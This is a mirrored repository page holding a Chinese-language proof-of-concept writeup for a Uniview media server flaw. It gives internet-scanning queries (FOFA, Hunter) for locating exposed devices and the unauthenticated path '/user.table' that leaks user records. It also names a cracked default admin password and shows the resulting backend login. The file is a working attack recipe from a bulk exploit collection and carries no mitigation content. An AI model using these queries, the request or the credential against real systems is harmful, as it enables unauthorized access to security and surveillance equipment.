admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-07 03:17:07 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/浙江宇视/浙江宇视媒体服务器-user-信息泄露漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

34 lines
1.2 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 浙江宇视媒体服务器-user-信息泄露漏洞
### 一、漏洞描述
浙江宇视科技有限公司创立于2011年是一家全球公共安全和智能交通的解决方案提供商。
浙江宇视科技有限公司转码服务器配置管理系统存在密码漏洞,攻击者可利用该漏洞登录后台。
### 二、影响版本
宇视转码服务器
### 三、资产测绘
fofa: body="images/a_fill_login_right_a.gif"
hunter: app.name=="Uniview 宇视媒体服务器"
界面
![1714987281244-1d5f2027-bfb1-42de-950f-d29610bbd967.png](./img/4oh0GhEEmgLWqzD7/1714987281244-1d5f2027-bfb1-42de-950f-d29610bbd967-091627.png)
### 四、漏洞复现
```plain
/user.table
```
![1714987215387-1c76dcb5-ff4f-4283-bad4-eae48ed6b024.png](./img/4oh0GhEEmgLWqzD7/1714987215387-1c76dcb5-ff4f-4283-bad4-eae48ed6b024-201161.png)使用MD5解密密码为Admin_123
![1714987514450-f760a7a9-25d7-42a5-b3eb-289504a3bd7b.png](./img/4oh0GhEEmgLWqzD7/1714987514450-f760a7a9-25d7-42a5-b3eb-289504a3bd7b-684386.png)后台界面
![1714987065893-3b381dd0-d9b8-41ce-9ed3-a1f75855f8ce.png](./img/4oh0GhEEmgLWqzD7/1714987065893-3b381dd0-d9b8-41ce-9ed3-a1f75855f8ce-848576.png)
> 更新: 2024-06-17 09:18:59
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fmgc1li99c5o7pm4>
Reference in New Issue View Git Blame Copy Permalink